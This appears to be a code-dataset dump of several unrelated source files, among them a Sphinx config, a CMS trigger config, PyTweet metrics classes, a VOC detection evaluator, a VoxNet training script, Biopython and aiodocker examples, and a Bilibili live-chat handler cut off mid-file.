# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"myst_parser",
"sphinx_copybutton",
"nbsphinx",
"sphinx.ext.napoleon",
"sphinx.ext.viewcode",
]
myst_enable_extensions = [
"amsmath",
"colon_fence",
"dollarmath",
]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# Group member variables and methods separately (not alphabetically)
autodoc_member_order = "groupwise"
# -- Options for nbsphinx ----------------------------------------------------
nbsphinx_codecell_lexer = 'ipython3'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_zama_theme'
html_logo = '_static/CN_logo.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_theme_options = {
"github_url": "https://github.com/zama-ai/concrete-numpy",
"twitter_url": "https://twitter.com/zama_fhe",
"icon_links": [{
"name": "Discourse",
"url": "https://community.zama.ai/c/concrete-numpy/7",
"icon": "fab fa-discourse",
}],
"navigation_depth": 2,
"collapse_navigation": True,
"google_analytics_id": "G-XRM93J9QBW",
}
html_context = {
"show_version": True,
"author": author,
"description": description,
"language": "en",
"versions_url": "#",
}
html_title = "%s Manual" % (project)
# Uncomment for test
# html_extra_path = ["versions.json", "alert.html"]
def setup(app):
html_init = f"const CURRENT_VERSION = {release!r};"
html_init += f"const ROOT_URL = {root_url!r};"
app.add_js_file(None, body=html_init, priority=100)
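# The injected body above amounts to an inline script defining, for the
# defaults in this file:
#   const CURRENT_VERSION = '0.5.0'; const ROOT_URL = '/concrete-numpy/';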
| 32.029412 | 79 | 0.648913 |
4a18afd3a9192894cc7809390e1f230bfd754653 | 1,218 | py | Python | L1TriggerConfig/GMTConfigProducers/test/minitestRS_cfg.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | ["Apache-2.0"] | stars: 852 (2015-01-11T21:03:51.000Z .. 2022-03-25T21:14:00.000Z) | issues: 30,371 (2015-01-02T00:14:40.000Z .. 2022-03-31T23:26:05.000Z) | forks: 3,240 (2015-01-02T05:53:18.000Z .. 2022-03-31T17:24:21.000Z) |
import FWCore.ParameterSet.Config as cms
process = cms.Process("L1ConfigWritePayloadDummy")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cout.enable = cms.untracked.bool(True)
process.MessageLogger.cout.threshold = cms.untracked.string('INFO')
process.MessageLogger.debugModules = cms.untracked.vstring('*')
# Generate dummy L1TriggerKeyList
process.load("CondTools.L1Trigger.L1TriggerKeyListDummy_cff")
# Get configuration data from OMDS. This is the subclass of L1ConfigOnlineProdBase.
process.load("L1TriggerConfig.GMTConfigProducers.L1MuGMTChannelMaskConfigOnline_cfi")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.source = cms.Source("EmptyIOVSource",
timetype = cms.string('runnumber'),
firstValue = cms.uint64(1),
lastValue = cms.uint64(1),
interval = cms.uint64(1)
)
process.getter = cms.EDAnalyzer("EventSetupRecordDataGetter",
toGet = cms.VPSet(cms.PSet(
record = cms.string('L1MuGMTChannelMaskRcd'),
data = cms.vstring('L1MuGMTChannelMask')
)),
verbose = cms.untracked.bool(True)
)
process.p = cms.Path(process.getter)
process.load("L1TriggerConfig.GMTConfigProducers.L1MuGMTRSKeysOnline_cff")
| 32.052632 | 85 | 0.776683 |
4a18b0d20323bbedfbe57c23ff0577809d7237fd | 495 | py | Python | research/views/__init__.py | ["Apache-2.0"] | stars: 3 on ZviBaratz/pylabber@35337284f3d0615249f642743b993b7dad407390 (2020-08-28T21:33:07.000Z .. 2021-07-19T17:52:17.000Z) | issues: 74 on TheLabbingProject/pylabber@27d6073e7bde871c16912a8ea5e0e389711bbd9f (2019-09-04T11:40:16.000Z .. 2022-01-03T19:43:04.000Z) | forks: 3 on ZviBaratz/pylabber@35337284f3d0615249f642743b993b7dad407390 (2019-05-07T07:09:05.000Z .. 2019-08-30T15:40:47.000Z) |
from research.views.data_acquisition import DataAcquisitionViewSet
from research.views.event import EventViewSet
from research.views.group import GroupViewSet
from research.views.measurement_definition import MeasurementDefinitionViewSet
from research.views.procedure import ProcedureViewSet
from research.views.procedure_step import ProcedureStepViewSet
from research.views.study import StudyViewSet
from research.views.subject import SubjectViewSet
from research.views.task import TaskViewSet
| 49.5 | 78 | 0.890909 |
4a18b10ef4b4b586170bbd67d94288f566d8044b | 407 | py | Python | catalog/migrations/0011_dayinstance_day_image.py | esalascolas/blog_diari | 43f6d22db745a38559fc2dcb8ea52c39a9d28753 | ["MIT"] | stars: null | issues: 13 (2020-02-11T22:06:44.000Z .. 2022-02-10T08:23:36.000Z) | forks: null |
# Generated by Django 2.0.1 on 2018-05-27 10:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('catalog', '0010_auto_20180527_1235'),
]
operations = [
migrations.AddField(
model_name='dayinstance',
name='day_image',
field=models.ImageField(default='', upload_to='day'),
),
]
| 21.421053 | 65 | 0.601966 |
4a18b196a9f5b661711cdebaf9b8f0be96544f27 | 1,825 | py | Python | pytweet/metrics.py | w3bhook/PyTweet | 0920523dfeee62c7d38014ec09ff49ffb4a0e194 | ["MIT"] | stars: null | issues: null | forks: null |
from typing import Any, Dict
__all__ = (
"UserPublicMetrics",
"TweetPublicMetrics",
)
class UserPublicMetrics:
__slots__ = ("__original_payload", "_public")
def __init__(self, data: Dict[str, Any] = {}):
self.__original_payload = data
self._public = self.__original_payload.get("public_metrics")
def __repr__(self) -> str:
return f"UserPublicMetrics(user={self.__original_payload.get('username')} follower_count={self.follower_count} following_count={self.following_count} tweet_count={self.tweet_count})"
@property
def follower_count(self) -> int:
return int(self._public.get("followers_count"))
@property
def following_count(self) -> int:
return int(self._public.get("following_count"))
@property
def tweet_count(self) -> int:
return int(self._public.get("tweet_count"))
@property
def listed_count(self) -> int:
return int(self._public.get("listed_count"))
class TweetPublicMetrics:
__slots__ = ("__original_payload", "_public")
def __init__(self, data: Dict[str, Any] = {}) -> None:
self.__original_payload = data
self._public = self.__original_payload.get("public_metrics")
def __repr__(self) -> str:
return f"TweetPublicMetrics(like_count={self.like_count} retweet_count={self.retweet_count} reply_count={self.reply_count}> quote_count={self.quote_count})"
@property
def like_count(self) -> int:
return int(self._public.get("like_count"))
@property
def retweet_count(self) -> int:
return int(self._public.get("retweet_count"))
@property
def reply_count(self) -> int:
return int(self._public.get("reply_count"))
@property
def quote_count(self) -> int:
return int(self._public.get("quote_count"))
| 29.918033 | 190 | 0.676712 |
4a18b2245746a4e9bb62690dd6c9c4af2d3903be | 12,965 | py | Python | utils/eval_tool.py | Ray-Luo/BV | 705a97b34f271d1d2b6eaba4777fcc48905c3852 | ["MIT"] | stars: null | issues: null | forks: null |
from __future__ import division
from collections import defaultdict
import itertools
import numpy as np
import six
from model.utils.bbox_tools import bbox_iou
def eval_detection_voc(
pred_bboxes, pred_labels, pred_scores, gt_bboxes, gt_labels,
gt_difficults=None,
iou_thresh=0.5, use_07_metric=False):
"""Calculate average precisions based on evaluation code of PASCAL VOC.
This function evaluates predicted bounding boxes obtained from a dataset
which has :math:`N` images by using average precision for each class.
The code is based on the evaluation code used in PASCAL VOC Challenge.
Args:
pred_bboxes (iterable of numpy.ndarray): An iterable of :math:`N`
sets of bounding boxes.
Its index corresponds to an index for the base dataset.
Each element of :obj:`pred_bboxes` is a set of coordinates
of bounding boxes. This is an array whose shape is :math:`(R, 4)`,
where :math:`R` corresponds
            to the number of bounding boxes, which may vary among images.
The second axis corresponds to
:math:`y_{min}, x_{min}, y_{max}, x_{max}` of a bounding box.
pred_labels (iterable of numpy.ndarray): An iterable of labels.
Similar to :obj:`pred_bboxes`, its index corresponds to an
index for the base dataset. Its length is :math:`N`.
pred_scores (iterable of numpy.ndarray): An iterable of confidence
scores for predicted bounding boxes. Similar to :obj:`pred_bboxes`,
its index corresponds to an index for the base dataset.
Its length is :math:`N`.
gt_bboxes (iterable of numpy.ndarray): An iterable of ground truth
bounding boxes
whose length is :math:`N`. An element of :obj:`gt_bboxes` is a
bounding box whose shape is :math:`(R, 4)`. Note that the number of
            bounding boxes in each image does not need to be the same as the number
of corresponding predicted boxes.
gt_labels (iterable of numpy.ndarray): An iterable of ground truth
labels which are organized similarly to :obj:`gt_bboxes`.
gt_difficults (iterable of numpy.ndarray): An iterable of boolean
arrays which is organized similarly to :obj:`gt_bboxes`.
This tells whether the
corresponding ground truth bounding box is difficult or not.
By default, this is :obj:`None`. In that case, this function
considers all bounding boxes to be not difficult.
iou_thresh (float): A prediction is correct if its Intersection over
Union with the ground truth is above this value.
use_07_metric (bool): Whether to use PASCAL VOC 2007 evaluation metric
for calculating average precision. The default value is
:obj:`False`.
Returns:
dict:
The keys, value-types and the description of the values are listed
below.
* **ap** (*numpy.ndarray*): An array of average precisions. \
The :math:`l`-th value corresponds to the average precision \
for class :math:`l`. If class :math:`l` does not exist in \
either :obj:`pred_labels` or :obj:`gt_labels`, the corresponding \
value is set to :obj:`numpy.nan`.
* **map** (*float*): The average of Average Precisions over classes.
"""
prec, rec = calc_detection_voc_prec_rec(
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults,
iou_thresh=iou_thresh)
ap = calc_detection_voc_ap(prec, rec, use_07_metric=use_07_metric)
return {'ap': ap, 'map': np.nanmean(ap)}
def calc_detection_voc_prec_rec(
pred_bboxes, pred_labels, pred_scores, gt_bboxes, gt_labels,
gt_difficults=None,
iou_thresh=0.5):
"""Calculate precision and recall based on evaluation code of PASCAL VOC.
This function calculates precision and recall of
predicted bounding boxes obtained from a dataset which has :math:`N`
images.
The code is based on the evaluation code used in PASCAL VOC Challenge.
Args:
pred_bboxes (iterable of numpy.ndarray): An iterable of :math:`N`
sets of bounding boxes.
Its index corresponds to an index for the base dataset.
Each element of :obj:`pred_bboxes` is a set of coordinates
of bounding boxes. This is an array whose shape is :math:`(R, 4)`,
where :math:`R` corresponds
            to the number of bounding boxes, which may vary among images.
The second axis corresponds to
:math:`y_{min}, x_{min}, y_{max}, x_{max}` of a bounding box.
pred_labels (iterable of numpy.ndarray): An iterable of labels.
Similar to :obj:`pred_bboxes`, its index corresponds to an
index for the base dataset. Its length is :math:`N`.
pred_scores (iterable of numpy.ndarray): An iterable of confidence
scores for predicted bounding boxes. Similar to :obj:`pred_bboxes`,
its index corresponds to an index for the base dataset.
Its length is :math:`N`.
gt_bboxes (iterable of numpy.ndarray): An iterable of ground truth
bounding boxes
whose length is :math:`N`. An element of :obj:`gt_bboxes` is a
bounding box whose shape is :math:`(R, 4)`. Note that the number of
            bounding boxes in each image does not need to be the same as the number
of corresponding predicted boxes.
gt_labels (iterable of numpy.ndarray): An iterable of ground truth
labels which are organized similarly to :obj:`gt_bboxes`.
gt_difficults (iterable of numpy.ndarray): An iterable of boolean
arrays which is organized similarly to :obj:`gt_bboxes`.
This tells whether the
corresponding ground truth bounding box is difficult or not.
By default, this is :obj:`None`. In that case, this function
considers all bounding boxes to be not difficult.
iou_thresh (float): A prediction is correct if its Intersection over
            Union with the ground truth is above this value.
Returns:
tuple of two lists:
This function returns two lists: :obj:`prec` and :obj:`rec`.
* :obj:`prec`: A list of arrays. :obj:`prec[l]` is precision \
for class :math:`l`. If class :math:`l` does not exist in \
either :obj:`pred_labels` or :obj:`gt_labels`, :obj:`prec[l]` is \
set to :obj:`None`.
* :obj:`rec`: A list of arrays. :obj:`rec[l]` is recall \
for class :math:`l`. If class :math:`l` that is not marked as \
difficult does not exist in \
:obj:`gt_labels`, :obj:`rec[l]` is \
set to :obj:`None`.
"""
total0 = 0
total1 = 0
for label in gt_labels:
for item in label:
if item == 0:
total0 += 1
else:
total1 += 1
    print('true damaged:', total0, 'true undamaged:', total1)
pred_bboxes = iter(pred_bboxes)
pred_labels = iter(pred_labels)
pred_scores = iter(pred_scores)
gt_bboxes = iter(gt_bboxes)
gt_labels = iter(gt_labels)
if gt_difficults is None:
gt_difficults = itertools.repeat(None)
else:
gt_difficults = iter(gt_difficults)
n_pos = defaultdict(int)
score = defaultdict(list)
match = defaultdict(list)
for pred_bbox, pred_label, pred_score, gt_bbox, gt_label, gt_difficult in \
six.moves.zip(
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults):
if gt_difficult is None:
gt_difficult = np.zeros(gt_bbox.shape[0], dtype=bool)
for l in np.unique(np.concatenate((pred_label, gt_label)).astype(int)):
pred_mask_l = pred_label == l
pred_bbox_l = pred_bbox[pred_mask_l]
pred_score_l = pred_score[pred_mask_l]
# sort by score
order = pred_score_l.argsort()[::-1]
pred_bbox_l = pred_bbox_l[order]
pred_score_l = pred_score_l[order]
gt_mask_l = gt_label == l
gt_bbox_l = gt_bbox[gt_mask_l]
gt_difficult_l = gt_difficult[gt_mask_l]
n_pos[l] += np.logical_not(gt_difficult_l).sum()
score[l].extend(pred_score_l)
if len(pred_bbox_l) == 0:
continue
if len(gt_bbox_l) == 0:
match[l].extend((0,) * pred_bbox_l.shape[0])
continue
# VOC evaluation follows integer typed bounding boxes.
pred_bbox_l = pred_bbox_l.copy()
pred_bbox_l[:, 2:] += 1
gt_bbox_l = gt_bbox_l.copy()
gt_bbox_l[:, 2:] += 1
iou = bbox_iou(pred_bbox_l, gt_bbox_l)
gt_index = iou.argmax(axis=1)
# set -1 if there is no matching ground truth
gt_index[iou.max(axis=1) < iou_thresh] = -1
del iou
selec = np.zeros(gt_bbox_l.shape[0], dtype=bool)
for gt_idx in gt_index:
if gt_idx >= 0:
if gt_difficult_l[gt_idx]:
match[l].append(-1)
else:
if not selec[gt_idx]:
match[l].append(1)
else:
match[l].append(0)
selec[gt_idx] = True
else:
match[l].append(0)
for iter_ in (
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults):
if next(iter_, None) is not None:
            raise ValueError('Length of input iterables need to be the same.')
n_fg_class = max(n_pos.keys()) + 1
prec = [None] * n_fg_class
rec = [None] * n_fg_class
for l in n_pos.keys():
score_l = np.array(score[l])
match_l = np.array(match[l], dtype=np.int8)
order = score_l.argsort()[::-1]
match_l = match_l[order]
tp = np.cumsum(match_l == 1)
fp = np.cumsum(match_l == 0)
# If an element of fp + tp is 0,
# the corresponding element of prec[l] is nan.
prec[l] = tp / (fp + tp)
print(tp[-1])
# print(fp)
# print(prec[l])
# break
# If n_pos[l] is 0, rec[l] is None.
if n_pos[l] > 0:
rec[l] = tp / n_pos[l]
return prec, rec
def calc_detection_voc_ap(prec, rec, use_07_metric=False):
"""Calculate average precisions based on evaluation code of PASCAL VOC.
This function calculates average precisions
from given precisions and recalls.
The code is based on the evaluation code used in PASCAL VOC Challenge.
Args:
prec (list of numpy.array): A list of arrays.
:obj:`prec[l]` indicates precision for class :math:`l`.
If :obj:`prec[l]` is :obj:`None`, this function returns
:obj:`numpy.nan` for class :math:`l`.
rec (list of numpy.array): A list of arrays.
:obj:`rec[l]` indicates recall for class :math:`l`.
If :obj:`rec[l]` is :obj:`None`, this function returns
:obj:`numpy.nan` for class :math:`l`.
use_07_metric (bool): Whether to use PASCAL VOC 2007 evaluation metric
for calculating average precision. The default value is
:obj:`False`.
Returns:
~numpy.ndarray:
This function returns an array of average precisions.
The :math:`l`-th value corresponds to the average precision
for class :math:`l`. If :obj:`prec[l]` or :obj:`rec[l]` is
:obj:`None`, the corresponding value is set to :obj:`numpy.nan`.
"""
n_fg_class = len(prec)
ap = np.empty(n_fg_class)
for l in six.moves.range(n_fg_class):
if prec[l] is None or rec[l] is None:
ap[l] = np.nan
continue
if use_07_metric:
# 11 point metric
ap[l] = 0
for t in np.arange(0., 1.1, 0.1):
if np.sum(rec[l] >= t) == 0:
p = 0
else:
p = np.max(np.nan_to_num(prec[l])[rec[l] >= t])
ap[l] += p / 11
else:
# correct AP calculation
# first append sentinel values at the end
mpre = np.concatenate(([0], np.nan_to_num(prec[l]), [0]))
mrec = np.concatenate(([0], rec[l], [1]))
mpre = np.maximum.accumulate(mpre[::-1])[::-1]
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap[l] = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
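# Editor's sketch (not part of the original module): how the two helpers above
# compose into a single mAP figure. The name `calc_detection_voc_prec_rec` for
# the precision/recall helper is assumed from the chainercv convention; adjust
# it if the function defined above this one is named differently.
def eval_detection_voc_map(pred_bboxes, pred_labels, pred_scores,
                           gt_bboxes, gt_labels, gt_difficults=None,
                           use_07_metric=False):
    # Per-class precision/recall curves, then per-class AP, then the nan-aware
    # mean (classes absent from the ground truth yield nan and are skipped).
    prec, rec = calc_detection_voc_prec_rec(
        pred_bboxes, pred_labels, pred_scores,
        gt_bboxes, gt_labels, gt_difficults)
    ap = calc_detection_voc_ap(prec, rec, use_07_metric=use_07_metric)
    return {'ap': ap, 'map': np.nanmean(ap)}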
| 40.77044
| 79
| 0.593598
|
4a18b3b643807b91152d740b2b7c26bb88f8fc1b
| 3,725
|
py
|
Python
|
eventtypeidentification/voxnet_train.py
|
marivasq/gamma-ai
|
735953e80901afea3e5cdeb2a7b27c9ab5725434
|
[
"MIT"
] | 6
|
2020-01-29T07:24:14.000Z
|
2022-03-16T10:05:25.000Z
|
eventtypeidentification/voxnet_train.py
|
marivasq/gamma-ai
|
735953e80901afea3e5cdeb2a7b27c9ab5725434
|
[
"MIT"
] | 6
|
2020-07-03T00:31:10.000Z
|
2021-09-10T07:45:01.000Z
|
eventtypeidentification/voxnet_train.py
|
marivasq/gamma-ai
|
735953e80901afea3e5cdeb2a7b27c9ab5725434
|
[
"MIT"
] | 5
|
2019-02-27T22:56:49.000Z
|
2019-08-24T19:01:41.000Z
|
import math, datetime, os
from voxnet import *
from volumetric_data import ShapeNet40Vox30
dataset = ShapeNet40Vox30()
voxnet = VoxNet()
p = dict() # placeholders
p['labels'] = tf.placeholder(tf.float32, [200, 6697])  # NOTE: hard-coded shape; must match the (batch_size, n_classes) batches fed below
p['loss'] = tf.nn.softmax_cross_entropy_with_logits(logits=voxnet[-2], labels=p['labels'])
p['loss'] = tf.reduce_mean(p['loss'])
p['l2_loss'] = tf.add_n([tf.nn.l2_loss(w) for w in voxnet.kernels])
p['correct_prediction'] = tf.equal(tf.argmax(voxnet[-1], 1), tf.argmax(p['labels'], 1))
p['accuracy'] = tf.reduce_mean(tf.cast(p['correct_prediction'], tf.float32))
p['learning_rate'] = tf.placeholder(tf.float32)
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
p['train'] = tf.train.AdamOptimizer(p['learning_rate'], epsilon=1e-3).minimize(p['loss'])
p['weights_decay'] = tf.train.GradientDescentOptimizer(p['learning_rate']).minimize(p['l2_loss'])
# Hyperparameters
num_batches = 2147483647
batch_size = 64
initial_learning_rate = 0.001
min_learning_rate = 0.000001
learning_rate_decay_limit = 0.0001
num_batches_per_epoch = len(dataset.train) / float(batch_size)
learning_decay = 10 * num_batches_per_epoch
weights_decay_after = 5 * num_batches_per_epoch
checkpoint_num = 0
learning_step = 0
min_loss = 1e308
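# Editor's sketch (added for clarity): the learning-rate schedule applied in the
# training loop below, factored out as a pure function so the decay horizon can
# be inspected; lr_at_step(learning_decay), i.e. 10 epochs in, is half of
# initial_learning_rate (until the floor is reached).
def lr_at_step(step):
    return max(min_learning_rate,
               initial_learning_rate * 0.5 ** (step / learning_decay))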
if not os.path.isdir('checkpoints'):
os.mkdir('checkpoints')
with open('checkpoints/accuracies.txt', 'w') as f:
f.write('')
with tf.Session() as session:
session.run(tf.global_variables_initializer())
for batch_index in xrange(num_batches):
learning_rate = max(min_learning_rate,
initial_learning_rate * 0.5**(learning_step / learning_decay))
learning_step += 1
        if batch_index > weights_decay_after and batch_index % 256 == 0:
            # Reuses feed_dict from the previous iteration; safe because this
            # branch cannot fire on the very first batch.
            session.run(p['weights_decay'], feed_dict=feed_dict)
voxs, labels = dataset.train.get_batch(batch_size)
feed_dict = {voxnet[0]: voxs, p['labels']: labels,
p['learning_rate']: learning_rate, voxnet.training: True}
session.run(p['train'], feed_dict=feed_dict)
if batch_index and batch_index % 512 == 0:
print("{} batch: {}".format(datetime.datetime.now(), batch_index))
print('learning rate: {}'.format(learning_rate))
feed_dict[voxnet.training] = False
loss = session.run(p['loss'], feed_dict=feed_dict)
print('loss: {}'.format(loss))
            # If the loss spikes well above the best value seen so far, jump the
            # decay schedule forward (a larger learning_step means a smaller
            # learning rate next iteration); resetting min_loss to the spike
            # avoids re-triggering on the same plateau.
            if (batch_index and loss > 1.5 * min_loss and
                learning_rate > learning_rate_decay_limit):
                min_loss = loss
                learning_step *= 1.2
                print("decreasing learning rate...")
min_loss = min(loss, min_loss)
if batch_index and batch_index % 2048 == 0:
num_accuracy_batches = 30
total_accuracy = 0
for x in xrange(num_accuracy_batches):
voxs, labels = dataset.train.get_batch(batch_size)
feed_dict = {voxnet[0]: voxs, p['labels']: labels, voxnet.training: False}
total_accuracy += session.run(p['accuracy'], feed_dict=feed_dict)
training_accuracy = total_accuracy / num_accuracy_batches
print('training accuracy: {}'.format(training_accuracy))
num_accuracy_batches = 90
total_accuracy = 0
for x in xrange(num_accuracy_batches):
voxs, labels = dataset.test.get_batch(batch_size)
feed_dict = {voxnet[0]: voxs, p['labels']: labels, voxnet.training: False}
total_accuracy += session.run(p['accuracy'], feed_dict=feed_dict)
test_accuracy = total_accuracy / num_accuracy_batches
print('test accuracy: {}'.format(test_accuracy))
print('saving checkpoint {}...'.format(checkpoint_num))
voxnet.npz_saver.save(session, 'checkpoints/c-{}.npz'.format(checkpoint_num))
with open('checkpoints/accuracies.txt', 'a') as f:
f.write(' '.join(map(str, (checkpoint_num, training_accuracy, test_accuracy)))+'\n')
print('checkpoint saved!')
checkpoint_num += 1
| 35.141509
| 97
| 0.721342
|
4a18b43043d5f7a3e9e512a6e505fa07dde29e86
| 1,092
|
py
|
Python
|
Doc/examples/make_subsmat.py
|
Amrithasuresh/biopython
|
85aa21c3ebe0d70c220d6dca7ab15fbb948a73c6
|
[
"BSD-3-Clause"
] | null | null | null |
Doc/examples/make_subsmat.py
|
Amrithasuresh/biopython
|
85aa21c3ebe0d70c220d6dca7ab15fbb948a73c6
|
[
"BSD-3-Clause"
] | null | null | null |
Doc/examples/make_subsmat.py
|
Amrithasuresh/biopython
|
85aa21c3ebe0d70c220d6dca7ab15fbb948a73c6
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2000 Brad Chapman. All rights reserved.
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Example of generating a substitution matrix from an alignment."""
from __future__ import print_function
# Biopython
from Bio import SubsMat
from Bio import AlignIO
from Bio.Alphabet import IUPAC, Gapped
from Bio.Align import AlignInfo
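# Editor's note: this example targets older Biopython releases. Bio.Alphabet was
# removed in Biopython 1.78 and Bio.SubsMat was deprecated and later removed, so
# pin an older release (e.g. biopython<1.78) to run this script as written.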
# get an alignment object from a Clustalw alignment output
c_align = AlignIO.read("protein.aln", "clustal", alphabet=Gapped(IUPAC.protein))
summary_align = AlignInfo.SummaryInfo(c_align)
# get a replacement dictionary and accepted replacement matrix
# exclude all amino acids that aren't charged polar
replace_info = summary_align.replacement_dictionary(
["G", "A", "V", "L", "I", "M", "P", "F", "W", "S", "T", "N", "Q", "Y", "C"]
)
my_arm = SubsMat.SeqMat(replace_info)
print(replace_info)
my_lom = SubsMat.make_log_odds_matrix(my_arm)
print("log_odds_mat: %s" % my_lom)
print(my_lom.format())
| 29.513514
| 80
| 0.746337
|
4a18b4a57f7ef737234a4fd331388b8fc4a24829
| 1,738
|
py
|
Python
|
tests/test_nodes.py
|
travigd/aiodocker
|
13d0abd3866da4f216f7c3c5b67ed3648e116cb5
|
[
"Apache-2.0"
] | null | null | null |
tests/test_nodes.py
|
travigd/aiodocker
|
13d0abd3866da4f216f7c3c5b67ed3648e116cb5
|
[
"Apache-2.0"
] | null | null | null |
tests/test_nodes.py
|
travigd/aiodocker
|
13d0abd3866da4f216f7c3c5b67ed3648e116cb5
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from aiodocker.exceptions import DockerError
@pytest.mark.asyncio
async def test_nodes_list(swarm):
swarm_nodes = await swarm.nodes.list()
assert len(swarm_nodes) == 1
@pytest.mark.asyncio
async def test_nodes_list_with_filter(swarm):
filters = {"role": "manager"}
filtered_nodes = await swarm.nodes.list(filters=filters)
assert len(filtered_nodes) == 1
filters = {"role": "worker"}
filtered_nodes = await swarm.nodes.list(filters=filters)
assert len(filtered_nodes) == 0
@pytest.mark.asyncio
async def test_node_inspect(swarm):
swarm_nodes = await swarm.nodes.list()
node_id = swarm_nodes[0]["ID"]
hostname = swarm_nodes[0]["Description"]["Hostname"]
node = await swarm.nodes.inspect(node_id=hostname)
    assert node_id in node["ID"]
node = await swarm.nodes.inspect(node_id=node_id)
assert hostname in node["Description"]["Hostname"]
@pytest.mark.asyncio
async def test_node_remove(swarm):
swarm_nodes = await swarm.nodes.list()
node_id = swarm_nodes[0]["ID"]
with pytest.raises(DockerError) as err_info:
await swarm.nodes.remove(node_id=node_id)
assert "is a cluster manager and is a member" in str(err_info)
@pytest.mark.asyncio
async def test_node_update(swarm):
swarm_nodes = await swarm.nodes.list()
node_id, version = swarm_nodes[0]["ID"], swarm_nodes[0]["Version"]["Index"]
    spec = {
        "Availability": "active",
        "Name": "special-node",
        "Role": "manager",
        "Labels": {
            "new_label": "true"
        }
    }
await swarm.nodes.update(node_id=node_id, version=version, spec=spec)
node = await swarm.nodes.inspect(node_id=node_id)
    assert node["Spec"] == spec
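# Editor's sketch (hedged extra check, not in the original suite): a node update
# should also bump the Swarm object's version index; this reuses only the calls
# already exercised above.
@pytest.mark.asyncio
async def test_node_update_bumps_version(swarm):
    swarm_nodes = await swarm.nodes.list()
    node_id, version = swarm_nodes[0]["ID"], swarm_nodes[0]["Version"]["Index"]
    spec = (await swarm.nodes.inspect(node_id=node_id))["Spec"]
    await swarm.nodes.update(node_id=node_id, version=version, spec=spec)
    node = await swarm.nodes.inspect(node_id=node_id)
    assert node["Version"]["Index"] > version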
| 27.15625
| 79
| 0.682969
|
4a18b67c918247a76f327148626a8b8dd63a128f
| 4,575
|
py
|
Python
|
blivedm/handlers.py
|
nie9286/blivedm
|
778573fb5abcd69fa565ebc0abd9e403298fce3c
|
[
"MIT"
] | null | null | null |
blivedm/handlers.py
|
nie9286/blivedm
|
778573fb5abcd69fa565ebc0abd9e403298fce3c
|
[
"MIT"
] | null | null | null |
blivedm/handlers.py
|
nie9286/blivedm
|
778573fb5abcd69fa565ebc0abd9e403298fce3c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
from typing import *
from . import client as client_
from . import models
__all__ = (
'HandlerInterface',
'BaseHandler',
)
logger = logging.getLogger('blivedm')
# Common cmds that are usually safe to ignore
IGNORED_CMDS = (
'COMBO_SEND',
'ENTRY_EFFECT',
'HOT_RANK_CHANGED',
'HOT_RANK_CHANGED_V2',
'INTERACT_WORD',
'LIVE',
'LIVE_INTERACTIVE_GAME',
'NOTICE_MSG',
'ONLINE_RANK_COUNT',
'ONLINE_RANK_TOP3',
'ONLINE_RANK_V2',
'PK_BATTLE_END',
'PK_BATTLE_FINAL_PROCESS',
'PK_BATTLE_PROCESS',
'PK_BATTLE_PROCESS_NEW',
'PK_BATTLE_SETTLE',
'PK_BATTLE_SETTLE_USER',
'PK_BATTLE_SETTLE_V2',
'PREPARING',
'ROOM_REAL_TIME_MESSAGE_UPDATE',
'STOP_LIVE_ROOM_LIST',
'SUPER_CHAT_MESSAGE_JPN',
'WIDGET_BANNER',
)
# Unknown cmds that have already been logged once
logged_unknown_cmds = set()
class HandlerInterface:
"""
    Interface for live-room message handlers.
"""
async def handle(self, client: client_.BLiveClient, command: dict):
raise NotImplementedError
class BaseHandler(HandlerInterface):
"""
    A simple handler implementation with message dispatching and message-type
    conversion. Subclass it and override the _on_xxx methods to build your own
    handler.
"""
def __heartbeat_callback(self, client: client_.BLiveClient, command: dict):
return self._on_heartbeat(client, models.HeartbeatMessage.from_command(command['data']))
def __danmu_msg_callback(self, client: client_.BLiveClient, command: dict):
return self._on_danmaku(client, models.DanmakuMessage.from_command(command['info']))
def __send_gift_callback(self, client: client_.BLiveClient, command: dict):
return self._on_gift(client, models.GiftMessage.from_command(command['data']))
def __guard_buy_callback(self, client: client_.BLiveClient, command: dict):
return self._on_buy_guard(client, models.GuardBuyMessage.from_command(command['data']))
def __super_chat_message_callback(self, client: client_.BLiveClient, command: dict):
return self._on_super_chat(client, models.SuperChatMessage.from_command(command['data']))
def __super_chat_message_delete_callback(self, client: client_.BLiveClient, command: dict):
return self._on_super_chat_delete(client, models.SuperChatDeleteMessage.from_command(command['data']))
    # cmd -> handler callback
_CMD_CALLBACK_DICT: Dict[
str,
Optional[Callable[
['BaseHandler', client_.BLiveClient, dict],
Awaitable
]]
] = {
        # Heartbeat received. This message is synthesized by blivedm itself; the
        # raw heartbeat packet has a different format.
        '_HEARTBEAT': __heartbeat_callback,
        # Danmaku (chat message) received
        # go-common\app\service\live\live-dm\service\v1\send.go
        'DANMU_MSG': __danmu_msg_callback,
        # A gift was sent
        'SEND_GIFT': __send_gift_callback,
        # Someone bought a guard (membership)
        'GUARD_BUY': __guard_buy_callback,
        # Super chat message
        'SUPER_CHAT_MESSAGE': __super_chat_message_callback,
        # Super chat message deleted
